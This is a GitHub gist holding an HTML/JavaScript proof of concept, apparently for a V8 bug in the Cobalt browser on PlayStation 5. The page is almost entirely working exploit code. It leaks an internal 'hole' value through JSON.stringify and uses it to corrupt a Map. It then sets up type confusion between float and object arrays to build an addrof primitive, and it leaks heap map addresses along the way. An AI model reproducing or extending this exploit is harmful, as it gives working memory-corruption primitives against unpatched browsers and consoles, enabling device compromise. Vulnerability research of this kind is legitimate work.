Last active
October 4, 2025 18:46
-
-
Save ntfargo/d4e61984ba4fc715a43a834b51811676 to your computer and use it in GitHub Desktop.
v8 | 40057710 issue test for cobalt 22.lts.2 (PlayStation 5)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html> | |
| <head> | |
| <title>c573dcc</title> | |
| <meta charset="utf-8" /> | |
| <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> | |
| <style type="text/css"> | |
| body { | |
| background-color: #f0f0f2; | |
| margin: 0; | |
| padding: 0; | |
| font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <div id="debuglog"></div> | |
| <script> | |
| function debug_log(msg) { | |
| let textNode = document.createTextNode(msg); | |
| let node = document.createElement("p").appendChild(textNode); | |
| document.body.appendChild(node); | |
| document.body.appendChild(document.createElement("br")); | |
| } | |
| var tempBuffer = new ArrayBuffer(8); | |
| var floatView = new Float64Array(tempBuffer); | |
| var intView = new Uint32Array(tempBuffer); | |
| function ftoi(val) { | |
| floatView[0] = val; | |
| return BigInt(intView[0]) + (BigInt(intView[1]) << 32n); | |
| } | |
| function itof(val) { | |
| intView[0] = Number(val & 0xffffffffn); | |
| intView[1] = Number(val >> 32n); | |
| return floatView[0]; | |
| } | |
| function addrof(obj){ | |
| floatArray[5] = itof(objMapAddr); | |
| objArray[0] = obj; | |
| floatArray[5] = itof(doubleMapAddr); | |
| return ftoi(objArray[0]); | |
| } | |
| function trigger() { | |
| let largeStr = '"'.repeat(0x800000); | |
| let container = []; | |
| for (let i = 0; i < 40; i++) | |
| container[i] = largeStr; | |
| container[41] = largeStr; | |
| try { | |
| JSON.stringify([container]); | |
| } catch (hole) { | |
| return hole; | |
| } | |
| } | |
| let hole = trigger(); | |
| debug_log("[+] Trigger: " + hole); | |
| var map1 = new Map(); | |
| map1.set(1, 1); | |
| map1.set(hole, 1); | |
| map1.delete(hole); | |
| map1.delete(hole); | |
| map1.delete(1); | |
| // map1 is now corrupted -1 | |
| let storedSize = map1.size; | |
| var floatArray = new Array(1.1,2.2,3.3); | |
| var objArray = new Array(1.1,1.1,1.1); | |
| map1.set(0x10, -1); | |
| map1.set(floatArray, 0x200); | |
| debug_log("[+] Map size: " + storedSize); | |
| let doubleMapAddr = ftoi(floatArray[5]); | |
| let mapOffset = (0x8n << 16n) + (0x19n << 8n) + 0x50n; | |
| let objMapAddr = doubleMapAddr - (mapOffset << 32n); | |
| debug_log("[+] Object map: 0x"+objMapAddr.toString(16)); | |
| debug_log("[+] Double map: 0x"+doubleMapAddr.toString(16)); | |
| var rwBuffer = new ArrayBuffer(0x500); | |
| var rwView = new DataView(rwBuffer); | |
| let b = addrof(rwBuffer)+0x1cn; | |
| debug_log("[+] rwBuffer @ "+b.toString(16)); | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment